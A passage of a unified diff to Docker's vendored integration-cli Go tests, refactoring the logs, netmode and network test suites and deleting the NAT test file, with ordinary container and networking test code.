+	c.Assert(out, checker.Contains, "no basic auth credentials")
 }
 
 // #23100
@@ -71,7 +77,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c *
 	os.Setenv("PATH", testPath)
 
 	cmd := exec.Command("docker-credential-shell-test", "store")
-	stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.username, s.reg.password)))
+	stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.Username(), s.reg.Password())))
 	cmd.Stdin = stdin
 	c.Assert(cmd.Run(), checker.IsNil)
 
@@ -84,7 +90,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c *
 	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
 	c.Assert(err, checker.IsNil)
 
-	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL)
 
 	b, err := ioutil.ReadFile(configPath)
 	c.Assert(err, checker.IsNil)
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go
index d2dcad1052..17ee5deaad 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go
@@ -8,47 +8,33 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/pkg/jsonmessage"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 // This used to work, it test a log of PageSize-1 (gh#4851)
 func (s *DockerSuite) TestLogsContainerSmallerThanPage(c *check.C) {
-	testLen := 32767
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen))
-
-	id := strings.TrimSpace(out)
-	dockerCmd(c, "wait", id)
-
-	out, _ = dockerCmd(c, "logs", id)
-
-	c.Assert(out, checker.HasLen, testLen+1)
+	testLogsContainerPagination(c, 32767)
 }
 
 // Regression test: When going over the PageSize, it used to panic (gh#4851)
 func (s *DockerSuite) TestLogsContainerBiggerThanPage(c *check.C) {
-	testLen := 32768
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen))
-
-	id := strings.TrimSpace(out)
-	dockerCmd(c, "wait", id)
-
-	out, _ = dockerCmd(c, "logs", id)
-
-	c.Assert(out, checker.HasLen, testLen+1)
+	testLogsContainerPagination(c, 32768)
 }
 
 // Regression test: When going much over the PageSize, it used to block (gh#4851)
 func (s *DockerSuite) TestLogsContainerMuchBiggerThanPage(c *check.C) {
-	testLen := 33000
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen))
+	testLogsContainerPagination(c, 33000)
+}
 
+func testLogsContainerPagination(c *check.C, testLen int) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen))
 	id := strings.TrimSpace(out)
 	dockerCmd(c, "wait", id)
-
 	out, _ = dockerCmd(c, "logs", id)
-
 	c.Assert(out, checker.HasLen, testLen+1)
 }
 
@@ -69,7 +55,7 @@ func (s *DockerSuite) TestLogsTimestamps(c *check.C) {
 
 	for _, l := range lines {
 		if l != "" {
-			_, err := time.Parse(jsonlog.RFC3339NanoFixed+" ", ts.FindString(l))
+			_, err := time.Parse(jsonmessage.RFC3339NanoFixed+" ", ts.FindString(l))
 			c.Assert(err, checker.IsNil, check.Commentf("Failed to parse timestamp from %v", l))
 			// ensure we have padded 0's
 			c.Assert(l[29], checker.Equals, uint8('Z'))
@@ -79,18 +65,13 @@ func (s *DockerSuite) TestLogsTimestamps(c *check.C) {
 
 func (s *DockerSuite) TestLogsSeparateStderr(c *check.C) {
 	msg := "stderr_log"
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg))
-
+	out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)).Combined()
 	id := strings.TrimSpace(out)
-	dockerCmd(c, "wait", id)
-
-	stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id)
-
-	c.Assert(stdout, checker.Equals, "")
-
-	stderr = strings.TrimSpace(stderr)
-
-	c.Assert(stderr, checker.Equals, msg)
+	cli.DockerCmd(c, "wait", id)
+	cli.DockerCmd(c, "logs", id).Assert(c, icmd.Expected{
+		Out: "",
+		Err: msg,
+	})
 }
 
 func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) {
@@ -98,54 +79,51 @@ func (s *DockerSuite) TestLogsStderrInStdout(c *check.C) {
 	// a bunch of ANSI escape sequences before the "stderr_log" message.
 	testRequires(c, DaemonIsLinux)
 	msg := "stderr_log"
-	out, _ := dockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg))
-
+	out := cli.DockerCmd(c, "run", "-d", "-t", "busybox", "sh", "-c", fmt.Sprintf("echo %s 1>&2", msg)).Combined()
 	id := strings.TrimSpace(out)
-	dockerCmd(c, "wait", id)
-
-	stdout, stderr, _ := dockerCmdWithStdoutStderr(c, "logs", id)
-	c.Assert(stderr, checker.Equals, "")
+	cli.DockerCmd(c, "wait", id)
 
-	stdout = strings.TrimSpace(stdout)
-	c.Assert(stdout, checker.Equals, msg)
+	cli.DockerCmd(c, "logs", id).Assert(c, icmd.Expected{
+		Out: msg,
+		Err: "",
+	})
 }
 
 func (s *DockerSuite) TestLogsTail(c *check.C) {
 	testLen := 100
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen))
+	out := cli.DockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo =; done;", testLen)).Combined()
 
 	id := strings.TrimSpace(out)
-	dockerCmd(c, "wait", id)
+	cli.DockerCmd(c, "wait", id)
 
-	out, _ = dockerCmd(c, "logs", "--tail", "0", id)
+	out = cli.DockerCmd(c, "logs", "--tail", "0", id).Combined()
 	lines := strings.Split(out, "\n")
 	c.Assert(lines, checker.HasLen, 1)
 
-	out, _ = dockerCmd(c, "logs", "--tail", "5", id)
+	out = cli.DockerCmd(c, "logs", "--tail", "5", id).Combined()
 	lines = strings.Split(out, "\n")
 	c.Assert(lines, checker.HasLen, 6)
 
-	out, _ = dockerCmd(c, "logs", "--tail", "99", id)
+	out = cli.DockerCmd(c, "logs", "--tail", "99", id).Combined()
 	lines = strings.Split(out, "\n")
 	c.Assert(lines, checker.HasLen, 100)
 
-	out, _ = dockerCmd(c, "logs", "--tail", "all", id)
+	out = cli.DockerCmd(c, "logs", "--tail", "all", id).Combined()
 	lines = strings.Split(out, "\n")
 	c.Assert(lines, checker.HasLen, testLen+1)
 
-	out, _ = dockerCmd(c, "logs", "--tail", "-1", id)
+	out = cli.DockerCmd(c, "logs", "--tail", "-1", id).Combined()
 	lines = strings.Split(out, "\n")
 	c.Assert(lines, checker.HasLen, testLen+1)
 
-	out, _, _ = dockerCmdWithStdoutStderr(c, "logs", "--tail", "random", id)
+	out = cli.DockerCmd(c, "logs", "--tail", "random", id).Combined()
 	lines = strings.Split(out, "\n")
 	c.Assert(lines, checker.HasLen, testLen+1)
 }
 
 func (s *DockerSuite) TestLogsFollowStopped(c *check.C) {
 	dockerCmd(c, "run", "--name=test", "busybox", "echo", "hello")
-	id, err := getIDByName("test")
-	c.Assert(err, check.IsNil)
+	id := getIDByName(c, "test")
 
 	logsCmd := exec.Command(dockerBinary, "logs", "-f", id)
 	c.Assert(logsCmd.Start(), checker.IsNil)
@@ -187,14 +165,14 @@ func (s *DockerSuite) TestLogsSince(c *check.C) {
 
 	// Test with default value specified and parameter omitted
 	expected := []string{"log1", "log2", "log3"}
-	for _, cmd := range []*exec.Cmd{
-		exec.Command(dockerBinary, "logs", "-t", name),
-		exec.Command(dockerBinary, "logs", "-t", "--since=0", name),
+	for _, cmd := range [][]string{
+		{"logs", "-t", name},
+		{"logs", "-t", "--since=0", name},
 	} {
-		out, _, err = runCommandWithOutput(cmd)
-		c.Assert(err, checker.IsNil, check.Commentf("failed to log container: %s", out))
+		result := icmd.RunCommand(dockerBinary, cmd...)
+		result.Assert(c, icmd.Success)
 		for _, v := range expected {
-			c.Assert(out, checker.Contains, v)
+			c.Assert(result.Combined(), checker.Contains, v)
 		}
 	}
 }
@@ -236,14 +214,15 @@ func (s *DockerSuite) TestLogsSinceFutureFollow(c *check.C) {
 func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) {
 	// TODO Windows: Fix this test for TP5.
 	testRequires(c, DaemonIsLinux)
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", `usleep 600000;yes X | head -c 200000`)
+	expected := 150000
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", fmt.Sprintf("usleep 600000; yes X | head -c %d", expected))
 
 	id := strings.TrimSpace(out)
 
 	stopSlowRead := make(chan bool)
 
 	go func() {
-		exec.Command(dockerBinary, "wait", id).Run()
+		dockerCmd(c, "wait", id)
 		stopSlowRead <- true
 	}()
 
@@ -251,20 +230,45 @@ func (s *DockerSuite) TestLogsFollowSlowStdoutConsumer(c *check.C) {
 	stdout, err := logCmd.StdoutPipe()
 	c.Assert(err, checker.IsNil)
 	c.Assert(logCmd.Start(), checker.IsNil)
+	defer func() { go logCmd.Wait() }()
 
 	// First read slowly
-	bytes1, err := consumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead)
+	bytes1, err := ConsumeWithSpeed(stdout, 10, 50*time.Millisecond, stopSlowRead)
 	c.Assert(err, checker.IsNil)
 
 	// After the container has finished we can continue reading fast
-	bytes2, err := consumeWithSpeed(stdout, 32*1024, 0, nil)
+	bytes2, err := ConsumeWithSpeed(stdout, 32*1024, 0, nil)
 	c.Assert(err, checker.IsNil)
 
+	c.Assert(logCmd.Wait(), checker.IsNil)
+
 	actual := bytes1 + bytes2
-	expected := 200000
 	c.Assert(actual, checker.Equals, expected)
 }
 
+// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping
+// for interval duration. Returns total read bytes. Send true to the
+// stop channel to return before reading to EOF on the reader.
+func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) {
+	buffer := make([]byte, chunkSize)
+	for {
+		var readBytes int
+		readBytes, err = reader.Read(buffer)
+		n += readBytes
+		if err != nil {
+			if err == io.EOF {
+				err = nil
+			}
+			return
+		}
+		select {
+		case <-stop:
+			return
+		case <-time.After(interval):
+		}
+	}
+}
+
 func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) {
 	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true; do echo hello; sleep 2; done")
 	id := strings.TrimSpace(out)
@@ -276,6 +280,7 @@ func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) {
 	r, w := io.Pipe()
 	cmd.Stdout = w
 	c.Assert(cmd.Start(), checker.IsNil)
+	go cmd.Wait()
 
 	// Make sure pipe is written to
 	chErr := make(chan error)
@@ -286,7 +291,8 @@ func (s *DockerSuite) TestLogsFollowGoroutinesWithStdout(c *check.C) {
 	}()
 	c.Assert(<-chErr, checker.IsNil)
 	c.Assert(cmd.Process.Kill(), checker.IsNil)
-
+	r.Close()
+	cmd.Wait()
 	// NGoroutines is not updated right away, so we need to wait before failing
 	c.Assert(waitForGoroutines(nroutines), checker.IsNil)
 }
@@ -300,8 +306,10 @@ func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) {
 	c.Assert(err, checker.IsNil)
 	cmd := exec.Command(dockerBinary, "logs", "-f", id)
 	c.Assert(cmd.Start(), checker.IsNil)
+	go cmd.Wait()
 	time.Sleep(200 * time.Millisecond)
 	c.Assert(cmd.Process.Kill(), checker.IsNil)
+	cmd.Wait()
 
 	// NGoroutines is not updated right away, so we need to wait before failing
 	c.Assert(waitForGoroutines(nroutines), checker.IsNil)
@@ -310,8 +318,8 @@ func (s *DockerSuite) TestLogsFollowGoroutinesNoOutput(c *check.C) {
 func (s *DockerSuite) TestLogsCLIContainerNotFound(c *check.C) {
 	name := "testlogsnocontainer"
 	out, _, _ := dockerCmdWithError("logs", name)
-	message := fmt.Sprintf("Error: No such container: %s\n", name)
-	c.Assert(out, checker.Equals, message)
+	message := fmt.Sprintf("No such container: %s\n", name)
+	c.Assert(out, checker.Contains, message)
 }
 
 func (s *DockerSuite) TestLogsWithDetails(c *check.C) {
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go
deleted file mode 100644
index 7f4cc2cbd7..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go
+++ /dev/null
@@ -1,93 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"io/ioutil"
-	"net"
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func startServerContainer(c *check.C, msg string, port int) string {
-	name := "server"
-	cmd := []string{
-		"-d",
-		"-p", fmt.Sprintf("%d:%d", port, port),
-		"busybox",
-		"sh", "-c", fmt.Sprintf("echo %q | nc -lp %d", msg, port),
-	}
-	c.Assert(waitForContainer(name, cmd...), check.IsNil)
-	return name
-}
-
-func getExternalAddress(c *check.C) net.IP {
-	iface, err := net.InterfaceByName("eth0")
-	if err != nil {
-		c.Skip(fmt.Sprintf("Test not running with `make test`. Interface eth0 not found: %v", err))
-	}
-
-	ifaceAddrs, err := iface.Addrs()
-	c.Assert(err, check.IsNil)
-	c.Assert(ifaceAddrs, checker.Not(checker.HasLen), 0)
-
-	ifaceIP, _, err := net.ParseCIDR(ifaceAddrs[0].String())
-	c.Assert(err, check.IsNil)
-
-	return ifaceIP
-}
-
-func getContainerLogs(c *check.C, containerID string) string {
-	out, _ := dockerCmd(c, "logs", containerID)
-	return strings.Trim(out, "\r\n")
-}
-
-func getContainerStatus(c *check.C, containerID string) string {
-	out := inspectField(c, containerID, "State.Running")
-	return out
-}
-
-func (s *DockerSuite) TestNetworkNat(c *check.C) {
-	testRequires(c, DaemonIsLinux, SameHostDaemon)
-	msg := "it works"
-	startServerContainer(c, msg, 8080)
-	endpoint := getExternalAddress(c)
-	conn, err := net.Dial("tcp", fmt.Sprintf("%s:%d", endpoint.String(), 8080))
-	c.Assert(err, check.IsNil)
-
-	data, err := ioutil.ReadAll(conn)
-	conn.Close()
-	c.Assert(err, check.IsNil)
-
-	final := strings.TrimRight(string(data), "\n")
-	c.Assert(final, checker.Equals, msg)
-}
-
-func (s *DockerSuite) TestNetworkLocalhostTCPNat(c *check.C) {
-	testRequires(c, DaemonIsLinux, SameHostDaemon)
-	var (
-		msg = "hi yall"
-	)
-	startServerContainer(c, msg, 8081)
-	conn, err := net.Dial("tcp", "localhost:8081")
-	c.Assert(err, check.IsNil)
-
-	data, err := ioutil.ReadAll(conn)
-	conn.Close()
-	c.Assert(err, check.IsNil)
-
-	final := strings.TrimRight(string(data), "\n")
-	c.Assert(final, checker.Equals, msg)
-}
-
-func (s *DockerSuite) TestNetworkLoopbackNat(c *check.C) {
-	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace)
-	msg := "it works"
-	startServerContainer(c, msg, 8080)
-	endpoint := getExternalAddress(c)
-	out, _ := dockerCmd(c, "run", "-t", "--net=container:server", "busybox",
-		"sh", "-c", fmt.Sprintf("stty raw && nc -w 5 %s 8080", endpoint.String()))
-	final := strings.TrimRight(string(out), "\n")
-	c.Assert(final, checker.Equals, msg)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go
index 4dfad937b5..76f9898d88 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go
@@ -1,7 +1,9 @@
 package main
 
 import (
-	"github.com/docker/docker/pkg/integration/checker"
+	"strings"
+
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/docker/docker/runconfig"
 	"github.com/go-check/check"
 )
@@ -44,10 +46,10 @@ func (s *DockerSuite) TestNetHostname(c *check.C) {
 	c.Assert(out, checker.Contains, runconfig.ErrConflictNetworkHostname.Error())
 
 	out, _ = dockerCmdWithFail(c, "run", "--net=container", "busybox", "ps")
-	c.Assert(out, checker.Contains, "--net: invalid net mode: invalid container format container:<name|id>")
+	c.Assert(out, checker.Contains, "invalid container format container:<name|id>")
 
 	out, _ = dockerCmdWithFail(c, "run", "--net=weird", "busybox", "ps")
-	c.Assert(out, checker.Contains, "network weird not found")
+	c.Assert(strings.ToLower(out), checker.Contains, "not found")
 }
 
 func (s *DockerSuite) TestConflictContainerNetworkAndLinks(c *check.C) {
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go
index 97f204ab47..95f7ccfff0 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go
@@ -10,14 +10,15 @@ import (
 	"net/http"
 	"net/http/httptest"
 	"os"
-	"path/filepath"
 	"strings"
 	"time"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/versions/v1p20"
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/daemon"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/runconfig"
 	"github.com/docker/libnetwork/driverapi"
@@ -27,6 +28,8 @@ import (
 	"github.com/docker/libnetwork/netlabel"
 	"github.com/go-check/check"
 	"github.com/vishvananda/netlink"
+	"golang.org/x/sys/unix"
+	"gotest.tools/icmd"
 )
 
 const dummyNetworkDriver = "dummy-network-driver"
@@ -43,16 +46,18 @@ func init() {
 type DockerNetworkSuite struct {
 	server *httptest.Server
 	ds     *DockerSuite
-	d      *Daemon
+	d      *daemon.Daemon
 }
 
 func (s *DockerNetworkSuite) SetUpTest(c *check.C) {
-	s.d = NewDaemon(c)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 }
 
 func (s *DockerNetworkSuite) TearDownTest(c *check.C) {
-	s.d.Stop()
-	s.ds.TearDownTest(c)
+	if s.d != nil {
+		s.d.Stop(c)
+		s.ds.TearDownTest(c)
+	}
 }
 
 func (s *DockerNetworkSuite) SetUpSuite(c *check.C) {
@@ -268,7 +273,7 @@ func assertNwList(c *check.C, out string, expectNws []string) {
 
 func getNwResource(c *check.C, name string) *types.NetworkResource {
 	out, _ := dockerCmd(c, "network", "inspect", name)
-	nr := []types.NetworkResource{}
+	var nr []types.NetworkResource
 	err := json.Unmarshal([]byte(out), &nr)
 	c.Assert(err, check.IsNil)
 	return &nr[0]
@@ -281,39 +286,6 @@ func (s *DockerNetworkSuite) TestDockerNetworkLsDefault(c *check.C) {
 	}
 }
 
-func (s *DockerSuite) TestNetworkLsFormat(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	out, _ := dockerCmd(c, "network", "ls", "--format", "{{.Name}}")
-	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
-
-	expected := []string{"bridge", "host", "none"}
-	var names []string
-	names = append(names, lines...)
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
-}
-
-func (s *DockerSuite) TestNetworkLsFormatDefaultFormat(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-
-	config := `{
-		"networksFormat": "{{ .Name }} default"
-}`
-	d, err := ioutil.TempDir("", "integration-cli-")
-	c.Assert(err, checker.IsNil)
-	defer os.RemoveAll(d)
-
-	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
-	c.Assert(err, checker.IsNil)
-
-	out, _ := dockerCmd(c, "--config", d, "network", "ls")
-	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
-
-	expected := []string{"bridge default", "host default", "none default"}
-	var names []string
-	names = append(names, lines...)
-	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names))
-}
-
 func (s *DockerNetworkSuite) TestDockerNetworkCreatePredefined(c *check.C) {
 	predefined := []string{"bridge", "host", "none", "default"}
 	for _, net := range predefined {
@@ -327,7 +299,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkCreateHostBind(c *check.C) {
 	dockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind")
 	assertNwIsAvailable(c, "testbind")
 
-	out, _ := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000")
+	out := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000")
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), checker.IsNil)
 	out, _ = dockerCmd(c, "ps")
@@ -344,6 +316,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkRmPredefined(c *check.C) {
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkLsFilter(c *check.C) {
+	testRequires(c, OnlyDefaultNetworks)
 	testNet := "testnet1"
 	testLabel := "foo"
 	testValue := "bar"
@@ -453,7 +426,7 @@ func (s *DockerSuite) TestDockerNetworkDeleteMultiple(c *check.C) {
 
 func (s *DockerSuite) TestDockerNetworkInspect(c *check.C) {
 	out, _ := dockerCmd(c, "network", "inspect", "host")
-	networkResources := []types.NetworkResource{}
+	var networkResources []types.NetworkResource
 	err := json.Unmarshal([]byte(out), &networkResources)
 	c.Assert(err, check.IsNil)
 	c.Assert(networkResources, checker.HasLen, 1)
@@ -475,32 +448,51 @@ func (s *DockerSuite) TestDockerNetworkInspectWithID(c *check.C) {
 
 func (s *DockerSuite) TestDockerInspectMultipleNetwork(c *check.C) {
 	result := dockerCmdWithResult("network", "inspect", "host", "none")
-	c.Assert(result, icmd.Matches, icmd.Success)
+	result.Assert(c, icmd.Success)
 
-	networkResources := []types.NetworkResource{}
+	var networkResources []types.NetworkResource
 	err := json.Unmarshal([]byte(result.Stdout()), &networkResources)
 	c.Assert(err, check.IsNil)
 	c.Assert(networkResources, checker.HasLen, 2)
+}
 
-	// Should print an error, return an exitCode 1 *but* should print the host network
-	result = dockerCmdWithResult("network", "inspect", "host", "nonexistent")
-	c.Assert(result, icmd.Matches, icmd.Expected{
+func (s *DockerSuite) TestDockerInspectMultipleNetworksIncludingNonexistent(c *check.C) {
+	// non-existent network was not at the beginning of the inspect list
+	// This should print an error, return an exitCode 1 and print the host network
+	result := dockerCmdWithResult("network", "inspect", "host", "nonexistent")
+	result.Assert(c, icmd.Expected{
 		ExitCode: 1,
 		Err:      "Error: No such network: nonexistent",
 		Out:      "host",
 	})
 
-	networkResources = []types.NetworkResource{}
-	err = json.Unmarshal([]byte(result.Stdout()), &networkResources)
+	var networkResources []types.NetworkResource
+	err := json.Unmarshal([]byte(result.Stdout()), &networkResources)
+	c.Assert(err, check.IsNil)
 	c.Assert(networkResources, checker.HasLen, 1)
 
+	// Only one non-existent network to inspect
 	// Should print an error and return an exitCode, nothing else
 	result = dockerCmdWithResult("network", "inspect", "nonexistent")
-	c.Assert(result, icmd.Matches, icmd.Expected{
+	result.Assert(c, icmd.Expected{
 		ExitCode: 1,
 		Err:      "Error: No such network: nonexistent",
 		Out:      "[]",
 	})
+
+	// non-existent network was at the beginning of the inspect list
+	// Should not fail fast, and still print host network but print an error
+	result = dockerCmdWithResult("network", "inspect", "nonexistent", "host")
+	result.Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Error: No such network: nonexistent",
+		Out:      "host",
+	})
+
+	networkResources = []types.NetworkResource{}
+	err = json.Unmarshal([]byte(result.Stdout()), &networkResources)
+	c.Assert(err, check.IsNil)
+	c.Assert(networkResources, checker.HasLen, 1)
 }
 
 func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) {
@@ -520,7 +512,7 @@ func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) {
 	}()
 
 	out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect")
-	networkResources := []types.NetworkResource{}
+	var networkResources []types.NetworkResource
 	err := json.Unmarshal([]byte(out), &networkResources)
 	c.Assert(err, check.IsNil)
 	c.Assert(networkResources, checker.HasLen, 1)
@@ -534,7 +526,7 @@ func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) {
 
 	// check whether network inspect works properly
 	out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect")
-	newNetRes := []types.NetworkResource{}
+	var newNetRes []types.NetworkResource
 	err = json.Unmarshal([]byte(out), &newNetRes)
 	c.Assert(err, check.IsNil)
 	c.Assert(newNetRes, checker.HasLen, 1)
@@ -598,6 +590,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnect(c *check.C) {
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	// test0 bridge network
 	dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test1")
 	assertNwIsAvailable(c, "test1")
@@ -638,6 +631,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) {
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	// Create a bridge network using custom ipam driver
 	dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "br0")
 	assertNwIsAvailable(c, "br0")
@@ -653,6 +647,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) {
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	// Create a bridge network using custom ipam driver and options
 	dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "--ipam-opt", "opt1=drv1", "--ipam-opt", "opt2=drv2", "br0")
 	assertNwIsAvailable(c, "br0")
@@ -664,6 +659,22 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) {
 	c.Assert(opts["opt2"], checker.Equals, "drv2")
 }
 
+func (s *DockerNetworkSuite) TestDockerNetworkNullIPAMDriver(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	// Create a network with null ipam driver
+	_, _, err := dockerCmdWithError("network", "create", "-d", dummyNetworkDriver, "--ipam-driver", "null", "test000")
+	c.Assert(err, check.IsNil)
+	assertNwIsAvailable(c, "test000")
+
+	// Verify the inspect data contains the default subnet provided by the null
+	// ipam driver and no gateway, as the null ipam driver does not provide one
+	nr := getNetworkResource(c, "test000")
+	c.Assert(nr.IPAM.Driver, checker.Equals, "null")
+	c.Assert(len(nr.IPAM.Config), checker.Equals, 1)
+	c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "0.0.0.0/0")
+	c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "")
+}
+
 func (s *DockerNetworkSuite) TestDockerNetworkInspectDefault(c *check.C) {
 	nr := getNetworkResource(c, "none")
 	c.Assert(nr.Driver, checker.Equals, "null")
@@ -727,7 +738,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomSpecified(c *check.C)
 	c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254")
 	c.Assert(nr.Internal, checker.False)
 	dockerCmd(c, "network", "rm", "br0")
-	assertNwNotAvailable(c, "test01")
+	assertNwNotAvailable(c, "br0")
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C) {
@@ -755,6 +766,7 @@ func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C
 }
 
 func (s *DockerNetworkSuite) TestDockerNetworkDriverOptions(c *check.C) {
+	testRequires(c, SameHostDaemon)
 	dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "-o", "opt1=drv1", "-o", "opt2=drv2", "testopt")
 	assertNwIsAvailable(c, "testopt")
 	gopts := remoteDriverNetworkRequest.Options[netlabel.GenericData]
@@ -798,16 +810,14 @@ func (s *DockerDaemonSuite) TestDockerNetworkNoDiscoveryDefaultBridgeNetwork(c *
 	hostsFile := "/etc/hosts"
 	bridgeName := "external-bridge"
 	bridgeIP := "192.169.255.254/24"
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
